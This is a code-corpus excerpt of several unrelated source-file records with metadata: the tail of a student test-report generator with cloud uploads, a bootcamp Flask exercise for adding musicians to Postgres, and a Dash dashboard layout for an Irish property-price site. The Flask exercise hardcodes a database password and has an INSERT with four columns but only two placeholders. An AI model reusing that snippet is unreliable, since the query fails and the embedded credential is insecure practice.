self.TEST_NAME,\n 'bkdn_dfs': self.bkdn_dfs}\n\n if student != 'key':\n\n student_answers = data[['key', student]].copy()\n student_answers = check_answers(student_answers, student)\n\n report_context['answers'] = student_answers\n report_context['bkdn'] = self.bkdn\n\n student_ans_w_bkdn = pd.concat([student_answers, self.bkdn], axis=1, sort=False) # .dropna()\n if self.debug:\n pickle_save(ensure_path(\n os.path.join(self.data_path, f'debug/{self.TEST_NAME}/{student}_ansWbkdn.pickle')),\n student_ans_w_bkdn)\n\n '''\n HERE: Iterate through sections!\n \n data filestructure:\n data-|\n |-TEST_NAME -|-student_1 -|-section1-(imgs)\n | |-section2\n | |-output_html\n | |-output_pdf\n |-student_2...\n \n '''\n for section in self.test_order:\n # Only process the data if the section is present, and the student is in the section:\n if (section in self.sections_present) and (student_in_section.get(student, {}).get(section)):\n report_context['sections'].append(section)\n report_context[section] = dict()\n\n section_imgs_path = os.path.join(student_output_path, section)\n if not os.path.exists(section_imgs_path):\n os.mkdir(section_imgs_path)\n\n section_df = student_ans_w_bkdn[student_ans_w_bkdn.section == section].copy()\n # fill in any nans:\n null_values = [np.nan, '']\n section_df = section_df.applymap(lambda x: 'NA' if x in null_values else x).fillna('NA')\n\n if self.debug:\n pickle_save(ensure_path(os.path.join(self.data_path,\n f'debug/{self.TEST_NAME}/{student}_{section}_df.pickle')),\n section_df)\n\n report_context[section]['df'] = section_df\n\n '''\n Calc Section Data for Cover Sheet:\n '''\n raw_data = self.raw_reports[section]\n print_conditional(section, self.log)\n # If there are any NA values in the 'correct' column, cast back to boolean FALSE.\n report_context[section]['n_correct'] = 
section_df.correct.apply(\n lambda x: False if x == 'NA' else x).sum()\n report_context[section]['n_total'] = section_df.shape[0]\n report_context['teacher_name'] = \\\n (raw_data.Teacher_First_Name + ' ' + raw_data.Teacher_Last_Name).dropna().iloc[0]\n\n paths_dict = dict()\n if (not self.answers_only) and (not self.skip_generation):\n # try\n topics_plot_path = section_topics_barplot_gen(section_df, student, section,\n section_imgs_path)\n\n subtopic_imgs_path = os.path.join(section_imgs_path, 'subsections')\n if not os.path.exists(subtopic_imgs_path):\n os.mkdir(subtopic_imgs_path)\n\n subtopics_plot_paths = section_subtopics_barplot_gen(section_df, student, section,\n subtopic_imgs_path)\n\n paths_dict = {'topic_fig': topics_plot_path,\n 'subtopic_figs': subtopics_plot_paths}\n\n if not self.skip_generation:\n self.write_report(student, self.TEST_NAME, section, \\\n section_df, paths_dict, test_output_path)\n\n # Outside of sections loop - only do once per student!\n if self.debug:\n pickle_save(\n ensure_path(f\"{self.data_path}/debug/{self.TEST_NAME}/{student}_coversheet_data.pickle\"),\n report_context)\n\n report_context['scores'] = score_converters.convert(report_context)\n\n if not self.skip_generation:\n self.write_coversheet(report_context)\n\n all_report_contexts.append(report_context)\n else:\n print(already_run_message)\n return test_output_path, all_report_contexts\n\n def gen_report_data(self, return_data=False, reset_after=False):\n '''\n Ensure no None values where necessary.\n '''\n\n assert self.params_set(), 'You are attempting to generate reports out of sequence. Please run self.set_params.'\n\n self.prepare_for_parse()\n\n data = self.parse_reports()\n\n test_output_path, all_report_contexts = self.generate(data)\n if len(all_report_contexts) > 0:\n self.merge_and_upload_reports(test_output_path, all_report_contexts)\n else:\n print('No reports to merge! 
Stopping run.')\n\n if reset_after:\n self.reset_to_do_more()\n\n if return_data:\n return {\n 'output_dest': test_output_path,\n 'contexts': all_report_contexts\n }\n\n def write_report(self, student, TEST_NAME, section, section_df, img_paths_dict, test_output_path):\n fname = f'{student}_{TEST_NAME}_{section}_report'.upper() + '.html'\n\n report_path = os.path.join(test_output_path, student)\n\n '''\n COPY resource_dir to outpath dir.\n '''\n\n path_to_styles = os.path.join(self.resource_path, 'base/styles')\n style_dest = os.path.join(report_path, 'styles')\n\n '''\n Move images, CSS and JS styles into student output dir if it doesn't already exist.\n '''\n if not os.path.exists(style_dest):\n print_conditional('Creating styles dir in:', self.log)\n print_conditional(style_dest, self.log)\n sh.copytree(path_to_styles, os.path.join(report_path, 'styles'))\n sh.copytree(os.path.join(self.resource_path, 'base/imgs'), os.path.join(report_path, 'imgs'))\n\n outpath = os.path.join(report_path, fname)\n doc = dominate.document(title=fname)\n\n '''\n Table Report Row Gen\n '''\n v = section_df.iloc[:, 1:4]\n v.columns = ['A', 'correct', 'Q']\n\n table_styles, table_html = make_report_table(section_df)\n\n '''\n Make the Doc\n '''\n with doc.head:\n link(rel='stylesheet', href='styles/css/bootstrap.css')\n link(rel='stylesheet', href=\"styles/css/report_styles.css\")\n raw(table_styles)\n\n with doc.body:\n '''\n REPORT PAGE (Answers, comments)\n '''\n div(h1(f'{student.title()} - Section: {section.upper()}'), _class='jumbotron text-center')\n p(f'{student}{section}{TEST_NAME}', _class='d-none', id='Info')\n with div(_class='container'):\n '''\n Row 1: Answers Table row:\n '''\n with div(_class='row'):\n '''\n raw(t.to_html(index=False, \\\n classes=[\"table-bordered\", \"table-striped\", \"table-hover\"], \\\n justify='center'))\n '''\n raw(table_html)\n with div(_class='row'):\n # u(h3('Evaluation', id='eval'))\n pass\n\n if not self.answers_only:\n '''\n Charts Page\n Plot Main Topic Fig:\n '''\n # Break page\n raw('
<div style=\"page-break-after: always\"></div>
')\n\n with div(_class='container'):\n '''\n Row 2: Img reports\n '''\n with div(_class='row'):\n topic_img = img_paths_dict['topic_fig']\n div(img(src=topic_img, _class='img-fluid'), _class='col-12 text-center')\n\n '''\n Plot Subtopic Figs\n '''\n if not self.answers_and_topics_only:\n subtopic_imgs = img_paths_dict['subtopic_figs']\n n_per_page = 4\n n_per_row = 2\n subtopic_img_lists = chunk_list(subtopic_imgs, n_per_page)\n for list_idx, img_list in enumerate(subtopic_img_lists):\n with div(_class='container'):\n img_grid = div(_class='container')\n curr_row = div(_class='row')\n for idx, ipath in enumerate(img_list):\n if (idx % n_per_row == 0) and (idx > 1):\n # Append finished row:\n img_grid.add(curr_row)\n # New row:\n curr_row = div(_class='row')\n img_div = div(_class='col-6')\n img_div.add(img(src=ipath, _class='img-fluid'))\n curr_row.add(img_div)\n\n if list_idx < len(subtopic_img_lists) - 1:\n # Break page after each grid of images.\n raw('
<div style=\"page-break-after: always\"></div>
')\n\n '''\n Post-Construction JS\n '''\n # For Table:\n script(src='styles/js/table_formatter.js')\n\n write_html(doc, outpath)\n\n def write_coversheet(self, report_context):\n\n student = report_context['student']\n if self.debug:\n pickle_save(f\"{self.data_path}/debug/{self.TEST_NAME}/{student}_context.pickle\", report_context)\n\n test_name = report_context['test_name']\n fname = f'{student}_{test_name}_COVERSHEET'.upper() + '.html'\n\n report_path = os.path.join(report_context['test_outdir'], student)\n\n outpath = os.path.join(report_path, fname)\n\n doc = dominate.document(title=fname)\n\n with doc.head:\n link(rel='stylesheet', href='styles/css/bootstrap.css')\n link(rel='stylesheet', href=\"styles/css/report_styles.css\")\n raw('''\n \n ''')\n\n with doc.body:\n with div(_class='container'):\n div(_class='row', style='height: 2em')\n # Header Image:\n with div(_class='row', style='height: 15em'):\n with div(_class='col-12 text-center'):\n img(src='REDACTED',\n _class='img-fluid', style='height: 15em')\n with div(_class='row', style=\"text-align: center\"):\n div('REDACTED', _class='col',\n style=\"display: inline-block; width: 100%\")\n\n with div(_class='row'):\n with div(_class='col align-self-center'):\n h3(f'{self.TEST_NAME} Score Sheet')\n p(strong('NAME:'), f' {student}', style='font-size: 2em')\n # p(f'Test Edition: {}')\n p(strong('CLASS/TUTOR:'),\n f' {report_context.get(\"teacher_name\")}',\n style='font-size: 2em')\n\n with table(_class='table'):\n thead(tr([th('')] + [th(strong(section), scope='col') for section in\n report_context['sections']]))\n with tr(scope='row', style={'text-align': 'center'}):\n td(strong('Correct:'))\n for section in report_context['sections']:\n section_data = report_context[section]\n td(f'{section_data[\"n_correct\"]}/{section_data[\"n_total\"]}')\n\n with div(_class='row jumbotron'):\n scores = report_context['scores']\n if self.debug:\n pickle_save(\n os.path.join(self.data_path, f'debug/{self.TEST_NAME}/{student}_score_conversions.pickle'),\n scores)\n with table(_class='table'):\n thead(tr([th('')] + [strong(th(section.upper(), scope='col')) for section, _ in scores]))\n with tr(scope='row', style={'text-align': 'center'}):\n td(strong('Scaled:'))\n for _, score in scores:\n td(f'{score}')\n\n write_html(doc, outpath)\n\n def merge_and_upload_reports(self, test_output_path, all_report_contexts):\n '''\n Make a post to the db app! 
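When not skipped by the debug flags, it also converts each student's HTML reports to PDF, merges them into a single file, uploads the merged PDF to S3/GCS, and notifies the student.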
\n '''\n if not self.no_upload_db:\n print_conditional('Uploading to DB app:', self.log)\n for report_context in all_report_contexts:\n upload_to_db(report_context, self.NAME_ID_MAP, self.test_meta_info)\n else:\n print_conditional('Skipping REDACTED Mongo upload (DEBUG)', self.log)\n\n test_dir = test_output_path\n\n student_names = [n for n in os.listdir(test_dir) if not n.startswith('.')]\n\n if not self.skip_merge:\n for student in student_names:\n print_conditional(f'Converting: {student.upper()}', self.log)\n test_name = self.TEST_NAME\n merged_pdf_fname = f'{student}_{test_name}_MERGED'.upper() + '.pdf'\n outdir = os.path.join(test_output_path, student)\n\n '''\n Get list of all files to merge:\n '''\n html_files = []\n for path, dirs, files in os.walk(outdir):\n for f in files:\n if '.html' in f:\n fpath = os.path.join(path, f)\n if 'COVERSHEET' in f:\n html_files.insert(0, fpath)\n else:\n html_files.append(os.path.join(path, f))\n\n print_conditional('Converting Reports to PDF:', self.log)\n watermark_path = os.path.join(self.resource_path, 'base/imgs/watermark.pdf')\n pdf_paths = [html_to_pdf(f, watermark_path) for f in tqdm(html_files)]\n\n '''\n Sort PDF paths by breakdown section order (self.test_order):\n '''\n # get coversheet\n cover = [pdf_paths[0]]\n # get non-coversheet\n non_cover = pdf_paths[1:]\n # sort (in place) by matching sections within pdf filenames\n non_cover.sort(\n key=lambda x:\n [idx for idx, section in enumerate(self.test_order) if f'_{section.upper()}_REPORT' in x][0])\n # list concatenate, and overwrite the old pdf_paths order:\n pdf_paths = cover + non_cover\n\n print_conditional('Merging:', self.log)\n merged_pdf_dest = os.path.join(outdir, merged_pdf_fname)\n merge_pdfs(pdf_paths, out_fname=merged_pdf_dest)\n\n '''\n Upload the merged pdf to AWS bucket:\n '''\n student_id = None\n if not self.no_upload_aws:\n student_id = self.NAME_ID_MAP[student]\n s3_dest = f'REDACTED'\n retry(upload_to_s3, 5, merged_pdf_dest, s3_dest)\n if not self.no_upload_gcp:\n gcp_dest = f'REDACTED'\n retry(upload_blob, 5, self.resource_path,\n 'REDACTED', merged_pdf_dest, gcp_dest)\n\n '''\n NOTIFY the student:\n '''\n # Will notify if not told to skip.\n # Will also NOT notify a student if their student_id can't be located.\n if (not self.skip_notifications):\n if not student_id:\n Alert(\n f\"Can't find student id {student_id} - either you're in debug mode and using a fake student, or there's something wrong with our student id database.\",\n title='Student ID Missing')\n else:\n base_url = 'REDACTED'\n api = 'REDACTED'\n url = os.path.join(base_url, api)\n request_body = {'gradecam_id': student_id,\n 'report_type': self.TEST_NAME}\n print_conditional('Notifying:', self.log)\n print_conditional(request_body, self.log)\n resp = retry(requests.post, 5, url, data=request_body)\n if resp.status_code != 200:\n print_conditional(f'Error notifying {student_id} at {url}', self.log)\n else:\n print_conditional('Skipping Notification step!', self.log)\n\n '''\n Delete all but the merged output\n '''\n if self.delete_non_merged:\n out_contents = os.listdir(outdir)\n for f in out_contents:\n path = os.path.join(outdir, f)\n if os.path.isfile(path):\n if '_MERGED.' 
not in path:\n os.remove(path)\n\n print_conditional(f'Report published to {merged_pdf_dest}!', self.log)\n else:\n print_conditional('Skipping report merge process (DEBUG).', self.log)\n\n '''\n Update S3 name-id map with local mappings.\n '''\n if not self.skip_name_mapping_step:\n print_conditional('Updating name-id records on S3...', self.log)\n retry(download_from_s3, 5, 'REDACTED', 'REDACTED')\n with open('REDACTED', 'r') as jf:\n remote_name_id_map = json.loads(jf.read())\n\n # Remove old version\n os.remove('REDACTED')\n # Update in memory\n remote_name_id_map.update(self.NAME_ID_MAP)\n\n # Write out as new (updated) version\n with open('REDACTED', 'w') as jf_out:\n jf_out.write(json.dumps(remote_name_id_map))\n\n # Finally, upload updated version\n # TO S3\n retry(upload_to_s3, 5, 'REDACTED', 'REDACTED')\n # TO GCP\n if not self.no_upload_gcp:\n retry(upload_blob, 5, self.resource_path,\n 'REDACTED', 'REDACTED', 'REDACTED')\n os.remove('REDACTED')\n else:\n print_conditional('Skipping name map step (DEBUG).', self.log)\n\n '''\n When all is finished:\n '''\n if not self.mem.get('aws_configured'):\n print_conditional('AWS not configured on this computer', self.log)\n if 'mgb' in os.environ['HOME']:\n print_conditional('Configuring as REDACTED', self.log)\n retry(aws_login, 5, os.path.abspath(self.resource_path), as_root=True)\n else:\n print_conditional('Configuring as REDACTED', self.log)\n retry(aws_login, 5, os.path.abspath(self.resource_path))\n self.mem['aws_configured'] = True\n self.save_mem()\n if not self.no_upload_aws:\n print_conditional('Uploading Files to AWS - Do Not Close Any Windows.', self.log)\n retry(update_test_archives_to_aws, 5, self.chosen_files, self.TEST_NAME)\n else:\n print_conditional('Skipping AWS archive upload (DEBUG).', self.log)\n","repo_name":"mgbvox/rg-public","sub_path":"ibid_reportgen/src/app/reportgen.py","file_name":"reportgen.py","file_ext":"py","file_size_in_byte":37545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7183472366","text":"from flask import Flask, request\nfrom psycopg2 import connect, OperationalError\n\napp = Flask(__name__)\n\nFORM = \"\"\"\n\n\n\n \n\n\n
<form method=\"post\">\n    Name: <input type=\"text\" name=\"name\"><br>\n    Surname: <input type=\"text\" name=\"surname\"><br>\n    Instrument: <input type=\"text\" name=\"instrument\"><br>\n    City: <input type=\"text\" name=\"city\"><br>\n    <input type=\"submit\" value=\"Add musician\">\n</form>
\n\n\n\"\"\"\n\n\ndef add_musician(cur, name, surname, instrument, city):\n sql = \"INSERT INTO Musicians(name, surname, instrument, city) VALUES(%s, %s);\"\n values = (name, surname, instrument, city)\n cur.execute(sql, values)\n\n\n@app.route(\"/new_musician\", methods=(\"GET\", \"POST\"))\ndef new_musician():\n if request.method == \"GET\":\n return FORM\n else:\n name = request.form.get(\"name\")\n surname = request.form.get(\"surname\")\n instrument = request.form.get(\"instrument\")\n city = request.form.get(\"city\")\n\n if not name or not surname or not instrument or not city:\n return \"Invalid data!\"\n\n try:\n connection = connect(database=\"exam_db\", user=\"postgres\", password=\"coderslab\", host=\"localhost\")\n connection.autocommit = True\n cursor = connection.cursor()\n add_musician(cursor, name, surname, instrument, city)\n connection.close()\n return \"New musician has been successfully added.\"\n except OperationalError as error:\n return error\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"MicJoz/Learning-Python-from-scratch","sub_path":"Python Developer Bootcamp/Advanced Python and Databases/Test retake/Task4.py","file_name":"Task4.py","file_ext":"py","file_size_in_byte":1929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"38989889794","text":"from datetime import datetime\nimport os\nimport base64\n\nimport dash_bootstrap_components as dbc\nfrom dash import dcc\nfrom dash import html\n\nfrom server_config import application\n\n#### CSS Theme Variables ####\nsetting = \"dark\"\n\nif setting == \"light\":\n nav_bar_css = \"navbar navbar-expand-lg navbar-light bg-primary\"\n summary_cards_css = \"card text-white bg-secondary mb-3\"\nelse:\n nav_bar_css = \"navbar navbar-expand-lg navbar-dark bg-dark\"\n div_main_css = \"card text-white bg-primary mb-3\"\n summary_cards_css = \"card text-white bg-success mb-3\"\n\n#### Setting the variables #####\n\n# List for charts\nchart = [\"Line Chart\", \"Violin Chart\", \"Bar Chart\"]\ngraphs = [\"Total Value\", \"Average Price\", \"Volume of Sales\"]\ncharts = []\nfor i in chart:\n if i != \"Violin Chart\":\n for j in graphs:\n charts.append(\"{} - {}\".format(i, j))\n else:\n charts.append(\"Violin Chart - Price\")\n\n\n#### Navbar Simple ####\nnavbar_simple = dbc.NavbarSimple(\n children=[\n dbc.DropdownMenu(\n nav=True,\n in_navbar=True,\n label=\"Menu\",\n children=[\n # dbc.DropdownMenuItem(\"GitHub\", href=\"https://github.com/emmc15\"),\n # dbc.DropdownMenuItem(divider=True),\n dbc.DropdownMenuItem(\"Support this website\", href=\"https://www.buymeacoffee.com/propeiredb\"),\n dbc.DropdownMenuItem(divider=True),\n dbc.DropdownMenuItem(\n \"Property Register Site\",\n href=\"https://propertypriceregister.ie/website/npsra/pprweb.nsf/PPR?OpenForm\",\n ),\n # dbc.DropdownMenuItem(divider=True),\n # dbc.DropdownMenuItem(\"CSS Theme\", href=\"https://bootswatch.com/flatly/\"),\n ],\n )\n ],\n brand=\"PropEireDB\",\n sticky=\"top\",\n className=nav_bar_css,\n id=\"nav-bar\",\n)\n# make dropdown for the link referneces in the page\ndropdown = dbc.DropdownMenu(\n children=[\n # NOTE: target parameter opens link in new tab rather than override this\n dbc.DropdownMenuItem(\"Buy Me a Coffee\", href=\"https://www.buymeacoffee.com/propeiredb\"),\n dbc.DropdownMenuItem(divider=True),\n dbc.DropdownMenuItem(\n \"Property Register Site\", href=\"https://propertypriceregister.ie/website/npsra/pprweb.nsf/PPR?OpenForm\"\n ),\n dbc.DropdownMenuItem(divider=True),\n 
dbc.DropdownMenuItem(\"Contact Us\", href=\"mailto:admin@propeiredb.ie\"),\n dbc.DropdownMenuItem(divider=True),\n dbc.DropdownMenuItem(\"T&Cs of PRSA Data Used\", href=\"http://psr.ie/en/PSRA/Pages/Re-Use_of_Information\"),\n ],\n nav=True,\n in_navbar=True,\n label=\"Menu\",\n size=\"sm\",\n right=True,\n)\n\n\n#### Navbar Complex ####\n# Base Navbar insert layout\nbase_navbar = dbc.Container(\n [\n # Sets the branding and the title\n dbc.Row(\n [\n # Imports the logo to the navbar NOTE: app.get_asset_url() searches for asset folder in python and pulls in the png image\n dbc.Col(html.Img(src=application.get_asset_url(\"white-home-6-point-see-through.png\"), height=\"40px\")),\n dbc.Col(dbc.NavbarBrand(\"PropEireDB\")),\n ],\n align=\"left\",\n ),\n # Sets the navbar to be collapsible for mobile view ie. menu dropdown on mobile\n dbc.NavbarToggler(id=\"navbar-toggler\"),\n # Adds in the dropdown for the collapse on mobile\n dbc.Collapse(\n dbc.Nav([dropdown], className=nav_bar_css, navbar=True, horizontal=\"end\"), id=\"navbar-collapse\", navbar=True\n ),\n ]\n)\n\n# Final creation of the nav bar\nnavbar_complex = dbc.Navbar(base_navbar, id=\"nav-bar\", className=nav_bar_css, color=\"green\")\n\n\n#### Region Selection #####\n\n# Region Choice\nregion_choice = html.Div(\n [\n html.H6(\"Select Map Type\"),\n dcc.Dropdown(\n id=\"region-dropdown\",\n options=[\n {\"label\": \"Province\", \"value\": \"Province\"},\n {\"label\": \"County\", \"value\": \"County\"},\n {\"label\": \"Dublin Area\", \"value\": \"Dublin Area\"},\n {\"label\": \"Dublin Scatter Map\", \"value\": \"Dublin Clustering\"},\n ],\n value=\"Province\",\n style={\"width\": \"75%\", \"display\": \"inline-block\"}\n # inputStyle={\"margin-right\": \"2px\", \"margin-left\": \"5px\"},\n # labelStyle={\"display\": \"inline-block\", \"margin-left\": \"50px\"},\n ),\n ],\n style={\"margin-left\": \"50px\"},\n)\n\n#### Area Choice ####\n# This selects the area based on the region choice selection\narea_choice = html.Div(\n [\n # Area Choice Dropdown\n html.H3(),\n html.H6(\"Select Areas\"),\n dcc.Dropdown(id=\"region-choice-dropdown\", multi=True, style={\"width\": \"75%\", \"display\": \"inline-block\"}),\n ],\n style={\"margin-left\": \"50px\"},\n)\n\n#### Invert Area Selection ####\ninvert_choice = html.Div(\n [\n dcc.Checklist(\n id=\"invert-region-choice\",\n options=[{\"label\": \"Invert Selection\", \"value\": True}],\n inputStyle={\"margin-right\": \"2px\", \"margin-left\": \"5px\"},\n labelStyle={\"display\": \"inline-block\", \"margin-left\": \"50px\"},\n )\n ]\n)\n\n##### Year Slider ####\n# Select the year via slider\nyear_slider = html.Div(\n [\n html.H6(\"Year Slider\"),\n dcc.Dropdown(id=\"year-choice-dropdown\", multi=True, options=[str(i) for i in range(2010, 2023)], value=\"2022\"),\n ],\n style={\"margin-left\": \"50px\", \"margin-right\": \"50px\", \"margin-bottom\": \"50px\"},\n)\n\n#### Period Slider ####\n\n# Select the periods via slider\nperiod_slider = html.Div(\n [\n html.H6(\"Month Slider\"),\n dcc.RangeSlider(\n id=\"time-of-year-choice-dropdown\",\n min=0,\n max=11,\n step=None,\n marks={\n 0: \"Jan\",\n 1: \"Feb\",\n 2: \"Mar\",\n 3: \"Apr\",\n 4: \"May\",\n 5: \"Jun\",\n 6: \"Jul\",\n 7: \"Aug\",\n 8: \"Sep\",\n 9: \"Oct\",\n 10: \"Nov\",\n 11: \"Dec\",\n },\n value=[0, 11],\n ),\n ],\n style={\"margin-left\": \"50px\", \"margin-right\": \"50px\", \"margin-bottom\": \"50px\"},\n)\n\n\ndate_picker = dcc.DatePickerRange(\n id=\"date-range\",\n start_date_placeholder_text=\"Start Period\",\n 
end_date_placeholder_text=\"End Period\",\n calendar_orientation=\"vertical\",\n start_date=datetime(2010, 1, 1),\n end_date=datetime.today(),\n)\n\ndate_picker = html.Div(\n [html.H6(\"Date Range\"), date_picker], style={\"margin-left\": \"50px\", \"margin-right\": \"50px\", \"margin-bottom\": \"50px\"}\n)\n\n#### Update Map Button ####\n\n# Button Div\nupdate_button = html.Div(\n [\n # Adds the button for updating the map\n html.Button(id=\"graph-button\", n_clicks=0, children=\"Update Map\", className=\"btn btn-outline-success\")\n ],\n style={\"width\": \"100%\", \"display\": \"flex\", \"align-items\": \"center\", \"justify-content\": \"center\"},\n)\n\n#### Input Area ####\n\n# Formats the html in single div with breaks between inputs\ninput_column = html.Div(\n [\n region_choice,\n html.Br(),\n area_choice,\n invert_choice,\n html.Br(),\n date_picker,\n # html.Br(),\n # year_slider,\n # html.Br(),\n # period_slider,\n # update_button,\n html.Br(),\n ]\n)\n\n# Converts to column and sets the widths for reformatting on different screens\n# input_column = dbc.Col([input_column], width=2, md=2, lg=2, xl=2, sm=12, xs=12)\n\n#### Map Column ####\n# Map Column\n# map_column=dbc.Col(\n# #Loading component to show user map is loading in long wait times\n# dcc.Loading(id='map-loading',\n# children=[dcc.Graph(id='mapbox', style={\"width\": \"75%\", 'height':'100%', \"display\": \"inline-block\"})],\n# type='cirlce',\n# color='#18BC9C'),\n# width=6, md=6, lg=6,xl=6,sm=12,xs=12\n# )\n\n# Used below instead as issue with loading object and hover data\n# NOTE: https://community.plot.ly/t/choroplethmapbox-hover-problem/33218\nnew_map_column = dbc.Col(\n # Loading component to show user map is loading in long wait times\n html.Div(\n [\n dcc.Graph(id=\"mapbox\", style={\"width\": \"100%\", \"height\": \"800px\", \"display\": \"inline-block\"}),\n ],\n style={\"margin-left\": \"30px\"},\n ),\n width=8,\n md=12,\n lg=8,\n xl=8,\n sm=12,\n xs=12,\n)\n\n\n#### Stacked High Level metrics ####\n# Stacked Values\nstacked_values = dbc.Col(\n [\n # Total Value\n html.Div(\n [\n html.H6(\"Total Value\", style={\"text-align\": \"center\"}),\n html.H4(id=\"total-value\", className=\"info-text\", style={\"text-align\": \"center\"}),\n ],\n id=\"total\",\n className=summary_cards_css,\n ),\n # Number of Sales\n html.Div(\n [\n html.H6(\"No. 
of Sales\", style={\"text-align\": \"center\"}),\n html.H4(id=\"volume-value\", className=\"info-text\", style={\"text-align\": \"center\"}),\n ],\n id=\"count\",\n className=summary_cards_css,\n ),\n # Average Price\n html.Div(\n [\n html.H6(\"Average Price\", style={\"text-align\": \"center\"}),\n html.H4(id=\"avg-value\", className=\"info-text\", style={\"text-align\": \"center\"}),\n ],\n id=\"avg\",\n className=summary_cards_css,\n ),\n # Pie Chart\n html.Div([dcc.Graph(id=\"pie-chart\", style={\"width\": \"100%\", \"height\": \"200px\", \"display\": \"inline-block\"})]),\n # Inputs\n html.Div([input_column]),\n ],\n width=3,\n md=12,\n lg=3,\n xl=3,\n sm=12,\n xs=12,\n)\n\n#### First Row ####\nannoying_alert = dbc.Alert(\n \"Data shown has missing entries and inaccuarcies, to help improve the system and keep it up to date and free from ads, please consider donating at https://www.buymeacoffee.com/propeiredb\",\n id=\"warning-alert\",\n dismissable=True,\n is_open=False,\n fade=True,\n class_name=\"alert alert-dismissable alert-danger\",\n)\nfirst_row = html.Div([annoying_alert, html.Br(), dbc.Row([new_map_column, stacked_values], justify=\"center\")])\n\n#### First Graph Area ####\n# top left graph and dropdown\nfirst_graph = dbc.Col(\n [\n # Sets the dropdown for the selection of what type of graph\n dcc.Dropdown(\n id=\"left-chart-dropdown\",\n options=[{\"label\": k, \"value\": k} for k in charts],\n value=\"Bar Chart - Total Value\",\n style={\"width\": \"75%\", \"display\": \"inline-block\", \"margin-left\": \"25px\"},\n ),\n # Optional radio buttons to allow greater choice graphing potential\n dcc.RadioItems(\n id=\"left-checkbox\",\n options=[\n {\"label\": \" Grouped by year \", \"value\": \"year\"},\n {\"label\": \" Grouped by period \", \"value\": \"period\"},\n {\"label\": \" Grouped by Area \", \"value\": \"area\"},\n ],\n value=\"area\",\n labelStyle={\"display\": \"inline-block\", \"margin-left\": \"50px\"},\n inputStyle={\"margin-right\": \"1px\", \"margin-left\": \"5px\"},\n ),\n # Graph layout object\n dcc.Graph(id=\"left-chart\", style={\"width\": \"100%\", \"height\": \"300px\", \"display\": \"inline-block\"}),\n ],\n width={\"size\": 6},\n md=6,\n lg=6,\n xl=6,\n sm=12,\n xs=12,\n)\n\n#### Second Graph Area #####\nsecond_graph = dbc.Col(\n [\n dcc.Dropdown(\n id=\"right-chart-dropdown\",\n options=[{\"label\": k, \"value\": k} for k in charts],\n value=\"Bar Chart - Volume of Sales\",\n style={\"width\": \"75%\", \"display\": \"inline-block\", \"margin-left\": \"25px\"},\n ),\n dcc.RadioItems(\n id=\"right-checkbox\",\n options=[\n {\"label\": \" Grouped by year \", \"value\": \"year\"},\n {\"label\": \" Grouped by period \", \"value\": \"period\"},\n {\"label\": \" Grouped by Area \", \"value\": \"area\"},\n ],\n value=\"area\",\n labelStyle={\"display\": \"inline-block\", \"margin-left\": \"50px\"},\n inputStyle={\"margin-right\": \"1px\", \"margin-left\": \"5px\"},\n ),\n dcc.Graph(id=\"right-chart\", style={\"width\": \"100%\", \"height\": \"300px\", \"display\": \"inline-block\"}),\n ],\n width={\"size\": 6},\n md=6,\n lg=6,\n xl=6,\n sm=12,\n xs=12,\n)\n\n#### Second Row ####\nsecond_row = html.Div([dbc.Row([first_graph, second_graph], justify=\"around\")])\n\n#### Bottom Graph ####\nbottom_graph = dbc.Col(\n [\n # Dropdown for choicing the graph\n dcc.Dropdown(\n id=\"chart-dropdown\",\n options=[{\"label\": k, \"value\": k} for k in charts],\n value=\"Line Chart - Total Value\",\n style={\"width\": \"75%\", \"display\": \"inline-block\", \"margin-left\": 
\"25px\"},\n ),\n # Hidden radio items to extend out the functionality of specific graphs\n dcc.RadioItems(\n id=\"series-checkbox\",\n options=[\n {\"label\": \" Grouped by year \", \"value\": \"year\"},\n {\"label\": \" Grouped by period \", \"value\": \"period\"},\n {\"label\": \" Grouped by Area \", \"value\": \"area\"},\n ],\n value=\"area\",\n labelStyle={\"display\": \"inline-block\", \"margin-left\": \"50px\"},\n inputStyle={\"margin-right\": \"1px\", \"margin-left\": \"5px\"},\n ),\n # graphing object\n dcc.Graph(id=\"series-chart\", style={\"width\": \"100%\", \"height\": \"300px\", \"display\": \"inline-block\"}),\n ]\n)\n\n#### Third Row ####\nthird_row = html.Div([html.Br(), dbc.Row([bottom_graph])])\n\n# -----------------------------------------------------------------------------\n# Layout Config\n# -----------------------------------------------------------------------------\n\n# buymeacoffee footer\nimage_filename = \"bmc-full-logo-no-background.png\"\nimage_filepath = os.path.join(os.getcwd(), \"assets\", image_filename)\nwith open(image_filepath, \"rb\") as img:\n encoded_image = base64.b64encode(img.read())\n\nbuymeacoffee_image = html.A(\n [html.Img(src=\"data:image/png;base64,{}\".format(encoded_image.decode()), height=100, width=200)],\n href=\"https://www.buymeacoffee.com/propeiredb\",\n style={\"display\": \"inline-block\"},\n)\n\nmail_to_footer = html.A(\"Contact Us at admin@propeiredb.ie\", href=\"mailto:admin@propeiredb.ie\")\nuse_of_data = html.A(\"T&Cs of PRSA Data Used\", href=\"http://psr.ie/en/PSRA/Pages/Re-Use_of_Information\")\nbuymeacoffee_image = dbc.Container(\n dbc.Row(\n [\n dbc.Col(\n [html.Br(), buymeacoffee_image, html.Br(), mail_to_footer, html.Br(), use_of_data],\n width=3,\n md=3,\n lg=3,\n xl=3,\n sm=12,\n xs=12,\n )\n ],\n align=\"center\",\n justify=\"center\",\n ),\n)\n\n#### Cached Div ####\ngeojson_div = html.Div(id=\"cached-geojson\", style={\"display\": \"none\"})\ninputs_div = html.Div(id=\"cached-inputs\", style={\"display\": \"none\"})\n\n\n#### Layout ####\nnavbar = navbar_complex\nfooter = html.Div([html.Br(), buymeacoffee_image])\nlayout = html.Div(\n [\n navbar,\n first_row,\n second_row,\n third_row,\n footer,\n geojson_div,\n inputs_div,\n dcc.Store(id=\"track-annoying-alert\", storage_type=\"memory\"),\n ]\n)\n\n#### Insert into Server ####\napplication.layout = layout # Assigns the layout\napplication.title = \"PropEireDB\"\n","repo_name":"emmc15/PropEireDb","sub_path":"src/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":15517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"27549002297","text":"import argparse\nimport load_data_ordered as load_data\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.io as sio\nimport run_TGM_LOSO\nimport os\n\n\nSENSOR_MAP = 